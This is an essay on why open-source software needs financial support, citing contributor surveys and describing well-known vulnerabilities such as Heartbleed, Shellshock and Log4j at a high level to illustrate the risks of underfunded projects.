The Importance of Financial Support for Open-Source Software

Abstract

Open-source software is growing in popularity and is now widely used in developing from small tools to critical software and services. However, financial support for open-source projects remains a major challenge. Many open-source contributors are not paid, leading to incomplete or abandoned projects, and the risk of cybersecurity threats from outdated or unsupported software. This paper aims to explore the importance of financial support for open-source software, highlighting its benefits to society and identifying ways to incentivize and support open-source contributors to make a living from their projects.

Introduction

Open-source software has become ubiquitous in modern technology, from web browsers and mobile operating systems to cloud infrastructure. It’s widely used in industries ranging from finance and healthcare to education. The growth of open-source software has been remarkable in recent years, with the number of projects increasing dramatically. According to GitHub’s 2020 State of the Octoverse, over 60 million new repositories were created that year, with more than 56 million developers contributing to them. The report also found that out of the 238 million repositories on GitHub, at least 42 million of them were public repositories. This shows that open-source software is a significant driver of technological innovation.

Lack of Financial Support for Open-Source Contributors

Although open-source software is widely used, financial support for its contributors remains a significant challenge. The 2020 FOSS Contributor Survey found that just over half of respondents were paid for at least some of their FOSS contributions by their employer or a third party, while just under half were volunteers. This raises the question of the role of money and corporate involvement in the future of FOSS, a topic of ongoing debate.

On one hand, if contributors cannot support themselves financially, they may be less likely to work on FOSS projects. Without financial support, they often have to work full-time jobs and devote their spare time to open-source work, leading to burnout, fatigue, and lack of motivation that can result in incomplete or abandoned projects.

On the other hand, there is a concern that paid contributors (especially project maintainers) may prioritize the interests of their employers rather than those of all project users. Additionally, if organizations paying employees to contribute decide it is no longer cost-effective to do so, this could be a significant issue, particularly in the event of a large negative economic shock like a recession.

Despite these challenges, a recent survey by DigitalOcean found that only 20% of respondents had been paid for their contributions to open source, while 53% agreed or strongly agreed that individuals should be compensated for their work. This suggests that there is room for improvement in financial support for open-source contributors.

Impact on Open-Source Users

The impact of the lack of funding on open-source software extends beyond the developers and contributors. It also affects the users of open-source software, who may rely on the software for critical operations. Without adequate support, open-source software may not receive timely updates, bug fixes, or security patches, leading to vulnerabilities that could be exploited by cybercriminals. This could pose a significant threat to companies that rely on open-source software.

Here are a few instances:

1. Heartbleed (CVE-2014–0160) — The Heartbleed, a vulnerability in OpenSSL, affected numerous websites and web services, including popular sites like Yahoo and GitHub. The vulnerability allowed attackers to access sensitive information such as passwords and private keys, potentially compromising user data.
2. Shellshock (CVE-2014–6271) — Shellshock, a vulnerability in the Bash shell, affected a wide range of systems, including Linux, Unix, and Mac OS X. The vulnerability allowed attackers to execute arbitrary code on vulnerable systems, potentially compromising sensitive information.
3. Libpng Integer underflow (CVE-2015–8540) — In 2015, the open-source software library libpng, used for handling PNG image files, was found to have several security vulnerabilities that could allow attackers to execute arbitrary code or cause denial of service attacks.
4. ImageMagick RCE (CVE-2016–3714) — In 2016, the open-source software library ImageMagick, used for processing images, was found to have a critical vulnerability that allowed attackers to execute arbitrary code by hiding it inside image files that a user uploads on servers using the software.
5. Apache Struts RCE (CVE-2017–5638) — The Apache Struts vulnerability affected a wide range of applications and services built on the Apache Struts framework, including government websites and financial institutions. The vulnerability allowed attackers to execute arbitrary code on vulnerable servers, potentially compromising sensitive information. The exploitation of this vulnerability resulted in the compromise of private records belonging to approximately 147.9 million Americans, 15.2 million British citizens, and around 19,000 Canadian citizens at Equifax, a credit bureau company. This incident is regarded as one of the biggest cybercrimes associated with identity theft.
6. Apache Tomcat RCE (CVE-2017–12617) — Apache Tomcat is a widely used open-source web server and servlet container. In 2017, a security vulnerability was discovered in Apache Tomcat that allowed remote attackers to execute arbitrary code or cause denial-of-service attacks.
7. Drupalgeddon (CVE-2018–7600) — Drupalgeddon affected many websites built on the Drupal content management system. The vulnerability allowed attackers to execute arbitrary code on vulnerable sites, potentially compromising sensitive information and allowing unauthorized access.
8. Ghostcat (CVE-2020–1938) — Ghostcat affected numerous systems running the Apache Tomcat server, which is commonly used for hosting Java-based applications. The vulnerability allowed attackers to read sensitive information from vulnerable servers, potentially compromising user data.
9. Log4j RCE (CVE-2021–44228) — In 2021, the log4j vulnerability was caused by a flaw in the code of the Log4j project, which allowed attackers to execute arbitrary code remotely. The impact of this vulnerability was significant and far-reaching, with many organizations and websites affected. The vulnerability was exploited in the wild by attackers to install ransomware, crypto-miners, and other types of malware on vulnerable servers. In addition, it was used to steal sensitive data, such as credentials and customer data.

Although not all open-source vulnerabilities are caused by a lack of funding, these incidents underscore the importance of sustained investment in open-source projects and the potential risks of relying on projects that don’t have sufficient resources for maintenance and development.

Recognising the Significance of Financial Support

Recognizing the crucial role that financial support plays in maintaining and enhancing the quality of open-source software is of paramount importance. All stakeholders, including developers, contributors, and users, have a shared interest in promoting the growth and sustainability of open-source software. Together, we can ensure that open-source software development continues to thrive and contribute to society.

There are various ways to support open-source projects, such as donating, participating in crowdfunding campaigns, or contributing to the development of open-source software. However, despite the funding models that have supported many open-source projects over the years, a significant number of initiatives still face financial challenges. To overcome these obstacles, collaboration among organizations, developers, and users is crucial. By providing financial support, we can ensure that these projects remain relevant, secure, and useful for years to come.

Conclusion

Open-source software has become an indispensable part of modern technology across various industries. However, the lack of financial support for open-source contributors has led to several challenges, including project abandonment, burnout, and delayed updates and security patches. Such issues pose a significant threat to users that rely on open-source software, making it crucial to recognize the importance of supporting the growth and sustainability of open-source software.

Providing fair compensation to open-source contributors is critical to the sustainability and growth of their projects, as it attracts more talented developers and improves their longevity. To incentivize all actors in an open-source project, sustainable funding solutions should be established, enabling open-source contributors to earn a livelihood from their projects while commercial users receive reliable and high-quality code.

In conclusion, financial support is essential to the growth and success of open-source software development. It is vital to work together to address the challenges faced by open-source software and ensure its continued success and benefits to society.